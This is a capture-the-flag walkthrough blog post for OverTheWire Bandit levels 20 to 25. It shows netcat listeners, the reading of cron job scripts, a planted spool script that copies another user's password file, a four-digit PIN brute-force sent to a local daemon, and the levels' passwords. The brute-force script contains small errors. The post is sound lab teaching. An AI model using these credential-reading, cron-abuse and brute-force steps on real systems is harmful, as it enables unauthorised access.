![Cover image for OverTheWire :- Bandit (Level 20–25) [CTF]](https://media.dev.to/cdn-cgi/image/width=1000,height=420,fit=cover,gravity=auto,format=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fi%2Ffu1pwzy0sz53qrb12f4q.png)
Level 20 → Level 21
Level Goal
There is a setuid binary in the homedirectory that does the following: it makes a connection to localhost on the port you specify as a commandline argument. It then reads a line of text from the connection and compares it to the password in the previous level (bandit20). If the password is correct, it will transmit the password for the next level (bandit21).
NOTE: Try connecting to your own network daemon to see if it works as you think
$ ssh bandit20@bandit.labs.overthewire.org -p 2220
This is a OverTheWire game server. More information on http://www.overthewire.org/wargames
bandit20@bandit.labs.overthewire.org's password: GbKksEFF4yrVs6il55v6gwY5aVje5f0j
Solution
bandit20@bandit:~$ echo "GbKksEFF4yrVs6il55v6gwY5aVje5f0j" | nc -l localhost -p 33333 &
[1] 25823
bandit20@bandit:~$ ./suconnect 33333
Read: GbKksEFF4yrVs6il55v6gwY5aVje5f0j
Password matches, sending next password
gE269g2h3mw3pwgrj0Ha9Uoqen1c9DGr
Level 21 → Level 22
Level Goal
A program is running automatically at regular intervals from cron, the time-based job scheduler. Look in /etc/cron.d/ for the configuration and see what command is being executed.
$ ssh bandit21@bandit.labs.overthewire.org -p 2220
This is a OverTheWire game server. More information on http://www.overthewire.org/wargames
bandit21@bandit.labs.overthewire.org's password:
gE269g2h3mw3pwgrj0Ha9Uoqen1c9DGr
Solution
bandit21@bandit:~$ cd /etc/cron.d
bandit21@bandit:/etc/cron.d$ cat cronjob_bandit22
@reboot bandit22 /usr/bin/cronjob_bandit22.sh &> /dev/null
* * * * * bandit22 /usr/bin/cronjob_bandit22.sh &> /dev/null
bandit21@bandit:~$ cat /usr/bin/cronjob_bandit22.sh
#!/bin/bash
chmod 644 /tmp/t7O6lds9S0RqQh9aMcz6ShpAoZKF7fgv
cat /etc/bandit_pass/bandit22 > /tmp/t7O6lds9S0RqQh9aMcz6ShpAoZKF7fgv
bandit21@bandit:~$ cat /tmp/t7O6lds9S0RqQh9aMcz6ShpAoZKF7fgv
Yk7owGAcWjwMVRwrTesJEwB7WVOiILLI
Level 22 → Level 23
Level Goal
A program is running automatically at regular intervals from cron, the time-based job scheduler. Look in /etc/cron.d/ for the configuration and see what command is being executed.
NOTE: Looking at shell scripts written by other people is a very useful skill. The script for this level is intentionally made easy to read. If you are having problems understanding what it does, try executing it to see the debug information it prints.
$ ssh bandit22@bandit.labs.overthewire.org -p 2220
This is a OverTheWire game server. More information on http://www.overthewire.org/wargames
bandit22@bandit.labs.overthewire.org's password:
Yk7owGAcWjwMVRwrTesJEwB7WVOiILLI
Solution
bandit22@bandit:~$ cd /etc/cron.d
bandit22@bandit:/etc/cron.d$ ls -l
total 24
-rw-r--r-- 1 root root 62 May 14 13:40 cronjob_bandit15_root
-rw-r--r-- 1 root root 62 Jul 11 15:56 cronjob_bandit17_root
-rw-r--r-- 1 root root 120 May 7 20:14 cronjob_bandit22
-rw-r--r-- 1 root root 122 May 7 20:14 cronjob_bandit23
-rw-r--r-- 1 root root 120 May 14 09:41 cronjob_bandit24
-rw-r--r-- 1 root root 62 May 14 14:04 cronjob_bandit25_root
bandit22@bandit:/etc/cron.d$ cat cronjob_bandit23
@reboot bandit23 /usr/bin/cronjob_bandit23.sh &> /dev/null
* * * * * bandit23 /usr/bin/cronjob_bandit23.sh &> /dev/null
bandit22@bandit:/etc/cron.d$ cat /usr/bin/cronjob_bandit23.sh
#!/bin/bash
myname=$(whoami)
mytarget=$(echo I am user $myname | md5sum | cut -d ' ' -f 1)
echo "Copying passwordfile /etc/bandit_pass/$myname to /tmp/$mytarget"
cat /etc/bandit_pass/$myname > /tmp/$mytarget
bandit22@bandit:/etc/cron.d$ echo I am user bandit23 | md5sum | cut -d ' ' -f 1
8ca319486bfbbc3663ea0fbe81326349
bandit22@bandit:/etc/cron.d$ cat /tmp/8ca319486bfbbc3663ea0fbe81326349
jc1udXuA1tiHqjIsL8yaapX5XIAI6i0n
Level 23 → Level 24
Level Goal
A program is running automatically at regular intervals from cron, the time-based job scheduler. Look in /etc/cron.d/ for the configuration and see what command is being executed.
NOTE: This level requires you to create your own first shell-script. This is a very big step and you should be proud of yourself when you beat this level!
NOTE 2: Keep in mind that your shell script is removed once executed, so you may want to keep a copy around…
$ ssh bandit23@bandit.labs.overthewire.org -p 2220
This is a OverTheWire game server. More information on http://www.overthewire.org/wargames
bandit23@bandit.labs.overthewire.org's password:
jc1udXuA1tiHqjIsL8yaapX5XIAI6i0n
Solution
bandit23@bandit:~$ cat /usr/bin/cronjob_bandit24.sh
#!/bin/bash
myname=$(whoami)
cd /var/spool/$myname
echo "Executing and deleting all scripts in /var/spool/$myname:"
for i in * .*;
do
if [ "$i" != "." -a "$i" != ".." ];
then
echo "Handling $i"
owner="$(stat --format "%U" ./$i)"
if [ "${owner}" = "bandit23" ]; then
timeout -s 9 60 ./$i
fi
rm -f ./$i
fi
done
Approach
Create a directory in the /tmp/ folder. Create a shell script to copy the /etc/bandit_pass/bandit24 to our /tmp/folder. Copy the shell script to /var/spool/bandit24/. Give the shell script and the /tmp/ folder appropriate permissions.
bandit23@bandit:~$ mkdir /tmp/abc
bandit23@bandit:~$ cd /tmp/abc
bandit23@bandit:/tmp/abc$ cat > abc.sh
#!/bin/bash
cat /etc/bandit_pass/bandit24 >> /tmp/abc/pass24
bandit23@bandit:/tmp/abc$ chmod 777 /tmp/abc
bandit23@bandit:/tmp/abc$ chmod 777 abc.sh
bandit23@bandit:/tmp/abc$ cp abc.sh /var/spool/bandit24/
--------------after some time -------------------
bandit23@bandit:/tmp/abc$ cat pass24
UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ
Level 24 -> Level 25
Level Goal
A daemon is listening on port 30002 and will give you the password for bandit25 if given the password for bandit24 and a secret numeric 4-digit pincode. There is no way to retrieve the pincode except by going through all of the 10000 combinations, called brute-forcing.
$ ssh bandit24@bandit.labs.overthewire.org -p 2220
This is a OverTheWire game server. More information on http://www.overthewire.org/wargames
bandit24@bandit.labs.overthewire.org's password:
UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ
Solution
bandit24@bandit:~$ mkdir /tmp/aaaa
bandit24@bandit:~$ cd /tmp/aaaa
bandit24@bandit:/tmp/aaaa$ cat > abc.sh
#!/bin/bash
for i in {1..10000}
do
echo "UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ $i" >> ./out
done
cat > out
bandit24@bandit:/tmp/aaaa$ chmod +x abc.sh
bandit24@bandit:/tmp/aaaa$ ./abc.sh
bandit24@bandit:/tmp/aaaa$ cat out | nc localhost 30002
-----------You will get password-----------
The password of user bandit25 is uNG9O58gUE7snukf3bvZ0rxhtnjzSGzG
THANKS FOR READING ...!!
Top comments (0)